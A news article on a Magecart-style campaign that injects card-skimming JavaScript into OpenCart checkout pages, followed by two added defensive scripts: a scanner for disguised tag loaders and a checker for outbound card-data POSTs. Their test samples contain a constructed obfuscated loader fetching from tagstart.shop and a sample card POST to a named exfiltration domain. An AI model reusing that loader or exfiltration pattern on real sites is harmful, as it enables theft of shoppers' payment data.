- OpenCart websites have been silently injected with malware that imitates trusted tracking scripts
- The script hides among analytics tags and quietly swaps real payment forms for fake ones
Obfuscated JavaScript
A new Magecart-style attack has raised concerns in the cybersecurity landscape, targeting e-commerce websites built on the OpenCart CMS.
The attackers injected malicious JavaScript into landing pages, cleverly hiding their payload among legitimate analytics and marketing tags such as Facebook Pixel, Meta Pixel and Google Tag Manager.
Experts at c/side, a cybersecurity company that monitors third-party scripts and web assets to detect and prevent client-side attacks, say the injected code looks like a standard tag snippet, but its behaviour tells another story.
Evasion techniques and script injection
This campaign disguises its malicious intent by base64-encoding the payload URL and routing traffic through suspicious domains such as /tagstart.shop/cdn/analytics.min.js, which makes detection in transit harder.
At first glance it appears to be a standard Google Analytics or Tag Manager script, but closer inspection reveals otherwise.
Once decoded and executed, the script dynamically creates a new script element, inserts it before the existing scripts and silently loads the additional code.
The malware then runs heavily obfuscated code, using techniques such as hexadecimal string references, array recombination and the eval() function for dynamic decoding.
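The indicators described above (a payload URL hidden in base64, a script element created and inserted before existing scripts, eval() and hex-escaped strings, all wrapped to look like a tag-manager snippet) can be checked for offline in a page's HTML. The following is an added example written for this article, not code from the article or from c/side: it extracts every script block, resolves the hosts it references in plain text or inside base64 literals, and compares them against an allowlist of tag vendors. The allowlist, the sample page and the host names in it other than tagstart.shop are constructed assumptions.

```javascript
// Added example (not from the article or c/side): static scan of a page's <script>
// blocks for the injection indicators the article describes. The vendor allowlist
// and the sample HTML below are constructed assumptions for a hypothetical shop.

const ALLOWED_SCRIPT_HOSTS = new Set([
  'www.googletagmanager.com',
  'www.google-analytics.com',
  'connect.facebook.net',
]);

// Pull every <script> out of raw HTML, keeping its src attribute (if any) and body.
function extractScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const scripts = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2] });
  }
  return scripts;
}

// Hostname of an absolute or scheme-relative URL; null for same-origin paths or junk.
function hostOf(url) {
  try {
    const host = new URL(url, 'https://placeholder.invalid').hostname;
    return host === 'placeholder.invalid' ? null : host;
  } catch { return null; }
}

// Hosts named in plain text plus hosts hidden inside base64 string literals.
function referencedHosts(body) {
  const hosts = new Set();
  for (const m of body.matchAll(/https?:\/\/[\w.-]+/gi)) hosts.add(hostOf(m[0]));
  for (const m of body.matchAll(/["']([A-Za-z0-9+/]{16,}={0,2})["']/g)) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^(https?:)?\/\/[\w.-]+\.[a-z]{2,}\//i.test(decoded)) hosts.add(hostOf(decoded));
  }
  hosts.delete(null);
  return hosts;
}

function scanScripts(html) {
  const findings = [];
  for (const s of extractScripts(html)) {
    const reasons = [];
    const hosts = referencedHosts(s.body);
    if (s.src && hostOf(s.src)) hosts.add(hostOf(s.src));
    for (const h of hosts) {
      if (!ALLOWED_SCRIPT_HOSTS.has(h)) reasons.push(`references non-allowlisted host ${h}`);
    }
    // Vendor snippets also insert scripts dynamically, so the next three are weak
    // signals alone; combined with an unknown host they match the campaign's pattern.
    if (/createElement\s*\(\s*["']script["']\s*\)/.test(s.body) && /insertBefore\s*\(/.test(s.body)) {
      reasons.push('dynamic script insertion');
    }
    if (/\beval\s*\(/.test(s.body)) reasons.push('eval()');
    if ((s.body.match(/\\x[0-9a-fA-F]{2}/g) || []).length >= 8) reasons.push('hex-escaped strings');
    if (reasons.length) findings.push({ src: s.src, reasons });
  }
  return findings;
}

// Constructed sample page: a genuine-looking GTM snippet, a same-origin script, and an
// injected loader whose payload URL (the one named in the article) is hidden in base64.
const HIDDEN_URL_B64 = Buffer.from('//tagstart.shop/cdn/analytics.min.js').toString('base64');
const SAMPLE_HTML = String.raw`
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-PLACEHOLDER');</script>
<script src="/assets/js/app.js"></script>
<script>
/* looks like a tag loader */
var _0x=["\x73\x63\x72\x69\x70\x74","\x73\x72\x63","\x65\x76\x61\x6c"];
var u=atob("${HIDDEN_URL_B64}");var s=document.createElement('script');s.src=u;
var f=document.getElementsByTagName('script')[0];f.parentNode.insertBefore(s,f);
eval(String.fromCharCode(0x76,0x61,0x72));
</script>`;

console.log(JSON.stringify(scanScripts(SAMPLE_HTML), null, 2));
```

The decisive signal is the unknown host: both the legitimate GTM snippet and the injected loader create and insert a script element, so that alone is not worth alerting on. A Content Security Policy with a script-src allowlist enforces the same host check in the browser and blocks the dynamically inserted script before it loads, which is the mitigation this scan only approximates after the fact.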
The script's core function is to inject a fake credit card form at checkout, designed to look legitimate.
Once rendered, the form captures input for the card number, expiry date and CVC. Listeners are attached to blur, keypress and paste events, ensuring that user input is captured at every stage.
Notably, the attack does not rely on clipboard scraping; users are made to enter the card details manually.
The data is then immediately exfiltrated via POST requests to two command-and-control (C2) domains: //UltraCart[.]Boutique/G.PHP and //hxjet.pics/g.php.
In a further twist, the original payment form is hidden once the card details have been submitted, and a second page prompts users to enter additional bank transaction details, compounding the threat.
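The exfiltration step leaves a network trace: card data leaves the checkout page in a POST to a host that is neither the merchant's nor a known vendor's. The following is an added example written for this article, not code from the article or from c/side: it reviews an outbound request log (as a proxy, HAR export or browser-side request hook would produce) and flags POSTs to unexpected hosts, escalating when a posted value passes the Luhn check. The log records, the merchant and vendor host lists, and the test card number are constructed; the hxjet.pics/g.php destination is the one named in the article.

```javascript
// Added example (not from the article or c/side): offline review of an outbound
// request log for the exfiltration pattern described above. The host lists and
// the sample records are constructed assumptions for a hypothetical shop.

const MERCHANT_HOSTS = new Set(['shop.example', 'api.payments.example']);
const VENDOR_HOSTS = new Set(['www.google-analytics.com', 'www.facebook.com']);

// Luhn check: true for digit strings that are structurally valid card numbers.
function luhnValid(digits) {
  if (!/^\d{13,19}$/.test(digits)) return false;
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = Number(digits[i]);
    if (double) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Flatten a request body into candidate values, whatever its encoding.
function bodyValues(body, contentType) {
  if (!body) return [];
  if (/json/i.test(contentType || '')) {
    try { return Object.values(JSON.parse(body)).map(String); } catch { return [body]; }
  }
  // application/x-www-form-urlencoded, the usual shape of a posted form
  return [...new URLSearchParams(body).values()];
}

function containsPan(values) {
  return values.some((v) => luhnValid(v.replace(/[\s-]/g, '')));
}

// Review POSTs leaving the checkout page. Merchant hosts are expected; vendor hosts
// are tolerated unless they receive a card number; anything else is reported.
function reviewRequests(records) {
  const alerts = [];
  for (const r of records) {
    if (r.method.toUpperCase() !== 'POST') continue;
    let host;
    try { host = new URL(r.url).hostname; } catch { continue; }
    if (MERCHANT_HOSTS.has(host)) continue;
    if (containsPan(bodyValues(r.body, r.contentType))) {
      alerts.push({ host, url: r.url, severity: 'high', reason: 'card number posted to non-merchant host' });
    } else if (!VENDOR_HOSTS.has(host)) {
      alerts.push({ host, url: r.url, severity: 'medium', reason: 'POST to unknown host from checkout page' });
    }
  }
  return alerts;
}

// Constructed sample log. 4111111111111111 is a widely used test number, not a real card.
const SAMPLE_LOG = [
  { method: 'GET', url: 'https://shop.example/checkout', body: null },
  { method: 'POST', url: 'https://api.payments.example/charge',
    contentType: 'application/x-www-form-urlencoded',
    body: 'cc=4111111111111111&exp=12%2F29&cvc=123' },
  { method: 'POST', url: 'https://www.google-analytics.com/collect',
    contentType: 'application/x-www-form-urlencoded',
    body: 'v=1&t=pageview&tid=UA-PLACEHOLDER' },
  { method: 'POST', url: 'https://hxjet.pics/g.php',
    contentType: 'application/x-www-form-urlencoded',
    body: 'n=4111 1111 1111 1111&e=12/29&c=123' },
  { method: 'POST', url: 'https://cdn.unknown-tag.example/log',
    contentType: 'application/json',
    body: '{"ev":"click"}' },
];

console.log(JSON.stringify(reviewRequests(SAMPLE_LOG), null, 2));
```

The medium-severity rule is deliberately broad and will need tuning per site, since tag managers add vendors over time; the high-severity rule is the one worth paging on, because there is no legitimate reason for a raw card number to be posted anywhere except the merchant's own payment endpoint.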
What stands out in this case is the unusually long delay before the stolen card data was used: several months rather than the typical few days.
The report notes that one card was used on June 18 for a pay-by-phone transaction in the United States, while another was charged €47.80 by an unidentified merchant.
This breach highlights a growing risk in SaaS-based e-commerce, where CMS platforms such as OpenCart become soft targets for advanced malware.
There is therefore a stronger need for security measures beyond basic firewalls.
Automated platforms such as c/side claim to detect these threats by identifying obfuscated JavaScript, unauthorized injections and abnormal script behaviour.
As attackers evolve, even small CMS deployments must remain vigilant; real-time monitoring and threat intelligence should no longer be optional for e-commerce providers seeking to keep their customers' trust.